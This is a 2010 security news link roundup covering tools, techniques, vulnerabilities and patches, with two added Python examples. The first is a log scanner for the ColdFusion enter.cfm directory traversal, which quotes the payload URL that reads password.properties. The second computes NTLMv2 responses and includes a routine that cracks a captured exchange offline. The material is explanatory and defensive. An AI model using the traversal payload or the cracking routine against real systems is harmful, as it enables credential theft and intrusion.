Events Related:
- “Crack Me If You Can” – DEFCON 2010 – korelogic.com
The core-counts for teams using clusters or EC2 are rough equivalents based on the number of compute-hours they report having used. See each team’s specific writeup for more details.
- BSidesLasVegas Recap – Day 1 – novainfosecportal.com
Since I took the most notes on the CCDC talk, I figure I’ll start with the other two first.
- A week of firsts in Vegas: Surviving B-Sides – tripwire.com
I learned all I could in the 48 hours given, stopping to sleep very little, and two things I learned stand out among the rest.
- Security B-Sides: The anti-conference – youtube.com
Help Net Security attended this year’s Security B-Sides Las Vegas and in this video you can see co-founder Chris Nickerson talk about the history of the event, what’s happening this year, as well as some future plans.
- RT @dave_rel1k: Follow @DerbyCon for updates regarding the new and upcoming hacker conference #DerbyCon – Sep 29 – Oct 2, 2011 – @hdmoore
- Security Ninja Goes Con-Hopping
- Day two of the Vegas cons, BlackHat, defcon registration and fun conversations – securityninja.co.uk
- Day three of the Vegas cons, defcon and nine talks – securityninja.co.uk
Resources:
- DEF CON 18 – Getting Social with the Smart Grid Slides Posted – fyrmassociates.com
My co-presenter, Justin Morehouse, just posted our slides here on SlideShare.
- My SecurityBSides Videos and Demos – securityninja.co.uk
I recorded the demo videos in quite a high quality format so I hope you will be able to clearly see the demonstrations and see how I fixed the vulnerabilities I was demonstrating.
Tools:
- 15 new nmap scripts – cqure.net
These scripts include support for collecting Internet password hashes and user ID files.
- OpenFISMA Release 2.8.0! – openfisma.org
Endeavor is proud to announce OpenFISMA 2.8.0, the latest release of our award-winning FISMA compliance software and enterprise risk management tool.
- Metasploit 3.4 and SET 0.6.1 on iPhone 4 – offensive-security.com
Just a quick update on getting your favorite tools on iOS 4 – Metasploit and SET.
- Constricting the Web: The GDS Burp API – gdssecurity.com
At GDS, of the many web application security testing tools available, we often use PortSwigger’s Burp Suite.
- TitanMist – reversinglabs.com
TitanMist is the nicely packaged and open-source catch-all tool that will become your first line of defense.
- skipfish 1.55b – code.google.com/p/skipfish
A fully automated, active web application security reconnaissance tool.
- Summertime and DOMScan – marcoramilli.blogspot.com
DOMScan is a utility to drive IE and capture the real-time DOM from the browser.
- BitBlaze – Binary Analysis Platform For Computer Security – darknet.org.uk
Binary analysis is imperative for protecting COTS (common off-the-shelf) programs and analyzing and defending against the myriad of malicious code.
- Version 0.2 of SSL Testing Tool ssltest.pl – grey-corner.blogspot.com
The changes in version 0.2 were essentially focused on getting the same functionality from the tool when run in Windows.
- Vera 0.20 – Now Available – offensivecomputing.net
If you’re not familiar with VERA, it’s a visualization tool to help understand the dynamic execution of a program.
- Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector – secmaniac.com
The Social-Engineer Toolkit (SET) gives you the ability to choose Metasploit-based payloads and drop a small download stager either through WSCRIPT or through PowerShell to download a backdoor from a remote IP/machine and execute it on the system itself.
- ROPEME – ROP Exploit Made Easy – vnsecurity.net
ROPEME – ROP Exploit Made Easy – is a PoC tool for ROP exploit automation on Linux x86.
- RIPS – sourceforge.net
RIPS is a static source code analyser for vulnerabilities in PHP web applications.
Techniques:
- BackTrack4-R1 + AWUS036NH = Win! – rootshell.be
For a long time, I used a good old Orinoco PCMCIA card to play around with WiFi networks.
- More Updates to the Backtrack 4 Full Disk Encryption How-to – infosecramblings.com
It turns out that the install of R1 pretty much uses up close to 8GB, actually about 7, but who’s counting.
- Defcon: Advanced Format String Attacks – redspin.com
My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation.
- Seven Security (Mis)Configurations in Java web.xml Files – sans.org
Instead of rehashing how to configure roles, protect web resources, and set up different types of authentication, let’s look at some of the most common security misconfigurations in Java web.xml files.
- Spanish Password Security – imperva.com
Of the 32 million passwords, a significant portion, 1,830,196, were identified as Spanish, which included passwords that could be bilingual.
- Signed Java Applet Security: Worse than ActiveX? – cert.org
From the user awareness point of view, if you are ever presented with a dialog that is requesting permission to run a signed Java applet, keep in mind that the code may be malicious.
- Followup to my Facebook research – skullsecurity.org
The first, and most obvious, occurs when Nmap (or the other tools I mentioned) are performing a password-guessing audit against a host.
- More Fun With Nessus Reports – wepma.blogspot.com
A common grievance for security professionals dealing with Nessus reports is the organization of the report by host or IP address.
- Teensy Pwn – vimeo.com
Teensy device programmed to download and execute MSF payload.
- XFS 101: Cross-Frame Scripting Explained – securestate.blogspot.com
XFS exploits a bug in specific browsers that allows a parent frame to be exposed to events in an embedded iFrame inside of it.
Vulnerabilities:
- Oracle Siebel Option Pack for IE ActiveX control memory initialization vulnerability – cert.org
The Oracle Siebel Option Pack for IE ActiveX control fails to properly initialize memory, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
- TANDBERG Video Communication Server Authentication Bypass Vulnerability – securiteam.com
This vulnerability allows for the complete bypass of authentication in the administrative web console.
- Adobe ColdFusion Vuln
The vulnerability, which was discovered by Richard Brain, was rated as “Important” by Adobe and could affect a large number of Internet-facing web servers.
- Adobe ColdFusion Directory Traversal Vulnerability – exploit-db.com
- Coldfusion Directory Traversal FAQ – gnucitizen.org
- Cold Fusion: http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en (carnal0wnage) – @tqbf
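A log check for the traversal pattern in the tweet above, added here as an example and not code from carnal0wnage, gnucitizen or exploit-db: it reads Apache-style access-log lines, keeps only requests under /CFIDE/, URL-decodes every query parameter up to twice (so the double-encoded variant is caught as well), and flags any value containing `../`, `..\` or an embedded NUL, which are the two ingredients of the enter.cfm locale payload. The log lines, IP addresses, timestamps and sizes are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (not real traffic). Line 1 is
# the locale traversal from the tweet, line 3 is the same payload double
# URL-encoded, the rest are benign admin and site traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2010:10:01:02 -0400] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Aug/2010:10:01:05 -0400] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 1123 "-" "Mozilla/5.0"
203.0.113.8 - - [12/Aug/2010:10:02:11 -0400] "GET /CFIDE/administrator/enter.cfm?locale=%252e%252e%252f%252e%252e%252fColdFusion8%252flib%252fpassword.properties%2500en HTTP/1.1" 200 4312 "-" "curl/7.19"
198.51.100.5 - - [12/Aug/2010:10:03:40 -0400] "GET /index.cfm?page=home HTTP/1.1" 200 8890 "-" "Mozilla/5.0"
198.51.100.6 - - [12/Aug/2010:10:04:02 -0400] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Only the fields we need from a combined-format line: client IP, timestamp,
# method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path traversal in either slash style, or a NUL byte used to truncate the
# string the application appends to the parameter.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|\x00')

# Path prefix under which the ColdFusion administrator lives (assumed default).
ADMIN_PREFIX = "/cfide/"


def decode_param(value: str, rounds: int = 2) -> str:
    """URL-decode repeatedly (bounded) so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_request(target: str):
    """Return a finding dict for a suspicious /CFIDE/ request, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().startswith(ADMIN_PREFIX):
        return None
    # parse_qs already decodes one layer; decode_param handles the rest.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_param(raw)
            if TRAVERSAL_RE.search(decoded):
                return {"path": parts.path, "param": name, "value": decoded}
    return None


def scan_log(text: str):
    """Scan log text line by line; return findings in file order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = check_request(m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {hit["path"]} '
              f'{hit["param"]}={hit["value"]!r}')
```

The status code is carried into each finding so an analyst can separate a probe the server rejected from one it answered with 200; whether the answered one actually returned the properties file has to be confirmed from the response size or the server itself.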
Vendor/Software Patches:
- Critical hole closed in Foxit Reader – h-online.com
As previously announced, Foxit Software has closed a critical hole in its PDF reader application that could allow for arbitrary code to be injected into a system.
- Fourteen security bulletins released by Microsoft
Eight have a maximum severity rating of Critical with the other six having a maximum severity rating of Important.
- Assessing the risk of the August security updates – technet.com
- Microsoft Security Bulletin MS10-047 – Important – microsoft.com
- Microsoft Security Bulletin MS10-048 – Important – microsoft.com
- Microsoft Security Bulletin MS10-049 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-050 – Important – microsoft.com
- Microsoft Security Bulletin MS10-051 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-052 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-053 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-054 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-055 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-056 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-057 – Important – microsoft.com
- Microsoft Security Bulletin MS10-058 – Important – microsoft.com
- Microsoft Security Bulletin MS10-059 – Important – microsoft.com
- Microsoft Security Bulletin MS10-060 – Critical – microsoft.com
- MS10-048 an explanation of the Defense in Depth fixes – technet.com
- MS10-049: A remote Code Execution vulnerability in SChannel, CVE-2010-2566 – technet.com
- MS10-049: An inside look at CVE-2009-3555, the TLS renegotiation vulnerability – technet.com
- MS10-054: Exploitability Details for the SMB Server Update – technet.com
- Adobe Flash update fixes flaw that enables clickjacking attacks – techtarget.com
Adobe repaired six memory corruption vulnerabilities in Flash Player that could enable an attacker to execute code remotely on a victim’s computer.
Other News:
- Toshiba touts drives that wipe data when turned off – computerworld.com
Toshiba on Tuesday introduced a new hard drive feature that can wipe out data after the storage devices are powered down.
- Browsers’ private modes leak info, say researchers – computerworld.com
Internet Explorer (IE), Firefox, Chrome and Safari offer private browsing intended to cloak a user from Web sites and erase all browsing evidence from the PC or Mac.
- IT Security Pros Mentoring Each Other for Career Growth – cio.com
Since then she has driven InfoSec Mentors by soliciting participants and matching up more veteran professionals with relative newcomers or those who are looking for guidance in making career changes.
- Verizon DBIR Cryptography Challenge: Here’s The First Clue – threatpost.com
So, according to a little birdie tweeting in the night, the 2010 Verizon Data Breach Investigations Report (DBIR) contains another encryption challenge that leads to actual cash prizes.
- Cars are hackable, just use the tire monitors
A team of researchers at a university has devised a way to hack into a car’s warning system via wireless sensors.
- Cars hacked by researchers through wireless tire pressure monitors – autoblog.com
- Hackers crash car computer while car is driving – slashgear.com
- New Mobile Security Threat: Fingerprint Oil – darkreading.com
Prepare for a new mobile security threat: smudges.
- Researcher Pinpoints Widespread Common Flaw Among VxWorks Devices – darkreading.com
Diagnostics service feature in VxWorks OS kept activated in some VoIP, DSL, SCADA systems leaves them open to attack.
- Security flaws haunt NTLMv1-2 challenge-response protocol – zdnet.com
NTLMv2 is the challenge-response protocol for performing MS Windows password authentication over the network.
- Cloning Retail Gift Cards – schneier.com
After researching how gift cards work, Zepeda purchased a magnetic card reader online, began stealing blank gift cards, on display for purchase, from Fred Meyer and scanning them with his reader.
- Ain’t “fat” tweets sweet? (they were) – scripting.com
But t.co doesn’t check to see that the thing you’re shortening is actually a URL. You can shorten things that aren’t.
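The NTLMv2 challenge-response from the zdnet item above, reduced to its arithmetic, as an added example that is not code from the article or from Microsoft. It follows the MS-NLMP computation: NT hash = MD4 of the UTF-16LE password, NTOWFv2 = HMAC-MD5 of the upper-cased user name plus domain keyed with the NT hash, and NTProofStr = HMAC-MD5 of the server challenge plus the client blob keyed with NTOWFv2. MD4 is written out because many current Python builds no longer expose it through hashlib. The user, domain, password, challenges, timestamp and AV pairs are constructed. The property it demonstrates: whoever captures one challenge/response pair off the wire can test password guesses offline at HMAC-MD5 speed with no lockout, which is why the password strength, not the protocol version, decides whether the capture is useful.

```python
import hashlib
import hmac
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python; needed because OpenSSL 3 hides md4)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = [a, b, c, d]
        for i in range(48):
            j = (-i) % 4  # register updated this step cycles a, d, c, b
            if i < 16:
                fn, k, s, add = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                fn, k, s, add = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                fn, k, s, add = h, r3_order[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            mixed = fn(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
            r[j] = _rotl((r[j] + mixed + x[k] + add) & 0xFFFFFFFF, s)
        a, b, c, d = [(v + w) & 0xFFFFFFFF for v, w in zip((a, b, c, d), r)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def ntlmv2_response(key_v2: bytes, server_challenge: bytes, client_challenge: bytes,
                    timestamp: bytes, target_info: bytes) -> bytes:
    """NTLMv2_RESPONSE = NTProofStr || blob, blob laid out per MS-NLMP 3.3.2."""
    blob = (b"\x01\x01" + b"\x00" * 6 + timestamp + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(key_v2, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def crack_captured(user: str, domain: str, server_challenge: bytes,
                   response: bytes, candidates):
    """Offline verification of guesses against one sniffed exchange."""
    nt_proof, blob = response[:16], response[16:]
    for pw in candidates:
        guess = hmac.new(ntowf_v2(pw, user, domain), server_challenge + blob,
                         hashlib.md5).digest()
        if hmac.compare_digest(guess, nt_proof):
            return pw
    return None


# Constructed credentials and nonces for the demonstration (not a real capture).
USER, DOMAIN, PASSWORD = "alice", "CORP", "Summer2010!"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")
TIMESTAMP = struct.pack("<Q", 0x01CB3A3D4B2E0000)  # arbitrary FILETIME
TARGET_INFO = (struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le")  # MsvAvNbDomainName
               + struct.pack("<HH", 0, 0))                             # MsvAvEOL


def demo():
    # Client side: the response a real client would send for this challenge.
    response = ntlmv2_response(ntowf_v2(PASSWORD, USER, DOMAIN), SERVER_CHALLENGE,
                               CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    # Attacker side: only user, domain, server challenge and response are needed.
    return crack_captured(USER, DOMAIN, SERVER_CHALLENGE, response,
                          ["password", "Summer2009!", "Summer2010!"])


if __name__ == "__main__":
    print("recovered:", demo())
```

The cracking loop does one MD4 and two HMAC-MD5 operations per guess and needs no further contact with the server; NTLMv2 improves on v1 by binding the client nonce, timestamp and target name into the keyed hash (which frustrates precomputation and some reflection), but the response is still only as strong as the password behind it.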